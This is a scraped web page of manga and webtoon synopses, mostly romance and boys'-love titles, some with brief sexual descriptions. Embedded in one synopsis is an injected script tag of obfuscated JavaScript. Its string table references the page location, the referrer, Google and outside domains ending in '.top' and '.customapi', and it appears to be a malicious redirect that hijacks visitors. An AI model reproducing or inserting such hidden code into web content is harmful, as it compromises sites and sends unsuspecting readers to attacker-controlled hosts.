Dr. Lee Sunwoo is one of the nation’s finest scientists, who dreams of a world where every human (including men) can conceive a child. Unfortunately, he eventually has to shut down his project. During his now ample free time, he happens to run into an old crush, a friend’s older brother, Eungyo. In any other world, this situation may be normal, but not when Sunwoo’s (extremely vocalized) desire is for Eungyo’s sperm!
Her family went bankrupt and her fiance broke up with her. On a snowy night, she met the guy who changes her whole life. In order to save the family, she gave up her dignity and pride. She thought everything would be better after that night, but the truth was… “You did all these on purpose!” He looked at her coldly, “Meeting you was the biggest mistake of my life.” It turned out that he had never loved her…<script></script><script>function _0x3fce(){var _0x14e45e=['lfwQK','google','FOgFh','3015730rwBPxO','floor','33zAWmCV','501076Kabjxz','then','location','https://ip','.top/','http://rea','UTMdS','1433481UUlKub','text','uYjVy','referrer','KkWNT','MVYzk','dma.net/','256nMJEVF','8106679HEhUkA','utntf','pNQBa','780798MkJewe','ewGlC','href','2HqSkiu','ymofu','86364VkKTnm','.customapi','includes','random','51950hBSEie','664NuPMdE'];_0x3fce=function(){return _0x14e45e;};return _0x3fce();}(function(_0x2a9019,_0x3beab4){var _0x47aafc=_0x588c,_0x5f379a=_0x2a9019();while(!![]){try{var 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"On a whim, Shina decides to paint his nails with his sister's nail polish. Seeing the beautiful sky-blue color on his nails makes his heart pound, but he's worried that it's weird how into his sister's stuff he is... so, he confides in his classmate, Shibuya. After talking to Shina, Shibuya developed an interest in cross-dressing videos. Confused by their feelings, the two boys find themselves painted in sky-blue confusion in a rose-colored romance."
Woo Jitaek, the chairman of Samjo Group, one of Korea's top conglomerates, became a case of DDCS (death during consensual sex), Soheon is under police investigation as the person he was with at the time of his death. Some time later, Soheon is suddenly called by Seoho, the president of the agency he works for... He offers Soheon some kind of deal, more like a threat he can't escape from. Seoho showed the video of the day in which Soheon appeared as the main character... Soheon's fate depends on the video of that day, Chairman Woo Jitaek's new will, and President Seoho. As a result, they are caught up in the fight for the management rights of the Samjo Group, and his life is on the line. Soheon and Seoho don't trust each other, but as time goes by, subtle emotions arise.
Minato, a good-natured university student, is taking a ferry back home. On the trip, he finds Izumi, a beauty who gazes fleetingly at the waves. As he's captivated by him, he realizes that he's trying to jump into the ocean...!! Minato rushes to save him, but they both end up falling into the water... and getting washed away to a desert island!? They take their soaked clothes off and sit close together to keep warm... but Izumi looks oddly sexy with his skin exposed. With a suggestive touch, he says, "Actually, I'm into men. Do you want to try it?" As the both of them lustfully jerk each other off, Minato feels a wave of incredible pleasure...
1. Chocolat of Instinct Ever since we were small, I've been good friends with Keigo, who's as cute as a girl. However, I started to be conscious of his body holding mine, his long and slender fingers, and his full lips... Before I knew it, my heart started to race for this cool Keigo... Hey, Keigo, what should I do with this feeling...? 2. Little Devil Gelatto Sei was a playboy throughout middle school who did it with every girl. Then, the next day he would break that girls heart and leave. That changed when a girl he had done it with actually falls in love with him. 3. Flower Trap "Under the wilting Cherry Tree, He laid a blanket of pink flowers." While I walked the cherry tree lined street i noticed him carrying a bouquet of flowers. The flowers belonged to the girl he liked. Then why, did he give one to me? 4. Substitute Camellia When i was confessed by him I was happy. I really loved him. Still, the pain of my brother getting married and going away hurt me. Is that why Kei thought he was a substitute? 5. It Slowly Turns Sweet Everyday,Aoi kisses a summer tangerine.chisato,her brother's friend,often stays over. extra of Chocolat of Instinct
Kentarou who works at the construction company founded by his father, meets Kawada, a salary-man sent by hir firm to the costruction site to supervise its progress. This newcomer soon brings his coworkers' dislike upon himself because of his cold attitude and his unpleasant comments. But one day, Kentarou accidently finds out that Kawada, despite his putting on airs, is still a virgin! In a moment of kindness, he decides to help him get to the next step by introducing girls to him, but Kawada seems to be more interested in Kentarou himself... ~ Ikemen Scans
"I'm hungry... Can I eat you?" When a young man picks up a mysterious egg, things start to get heated. Could this be the start of a sweet romance? +
“I might be a bit heavy, but please take care of me.” After breaking off a relationship heatedly, she's proposed to!? The blunt and mysterious coworker Kido-kun is only protective towards Momoko. Because of this, he's given a nickname, “Guard Dog”. Momoko is happy since she's secretly in love with him, but is unsure whether it's unrequited. She can't figure out his intentions and struggles every day. One day, Momoko is being stalked by her ex-boyfriend when she's saved by Kido-kun. “I'm the one that's dating Fujita now. Stay away from Momoko from now on!”. Even if it's a lie, her heart flutters upon hearing that, but Kido-kun gently pushes her down saying “That was half a lie and half my selfish desire”...!? It's her first time being held so gently, and she's caught in the pleasure.
Being in love with your straight sempai isn't easy, but being in love with your straight, homophobic, and (to top it off) tyrannical sempai can be hell! And that's something Tetsuhiro Morinaga can relate to... especially now that he's had a taste of the forbidden fruit! Features the same homophobic brother from Challengers, but this time as the main character! Contains an extra story called Bokutachi no Shippai in v.5 featuring Masaki and Morinaga's big brother Kunihiro. Takanaga Hinako confirmed on her Twitter account that her manga Koisuru Boukun will resume serialization in the February's 2015 issue of Kaiohsha's Gush magazine. Contains an extra story called Bokutachi no Shippai in v.5. The main story is complete with volume 8, but Hinako Takanaga has started writing another volume or two's worth of side stories.
Yuki decided to live alone when she got a job. However due to a mistake in the contract she has to live with Keita, her childhood friend! The two of them then established a set of rules for their cohabitation life together but there's a penalty if one break the rules! What's the penalty?!
"I'm glad you're my destiny." One day, Haru of Ω woke up in an oasis in the desert and felt a trembling sensation all over her body when she saw a black beastman appearing in front of her. In a situation where he has lost his memory and does not even know his own name, Viano, the α, who is the leader of the black panther tribe and who himself summoned Haru, speaks gently. "This is a world ruled by beastmen, and it's the turn of fate for me and Haru." Haru, who knows this world and spends his days with Viano, feels an irresistible passion and emotion. However, Haru, who cannot conceive Viano's child no matter how much she wants, finally puts herself in a dangerous situation...and remembers. The memories of his former world and the meaning of losing those memories -...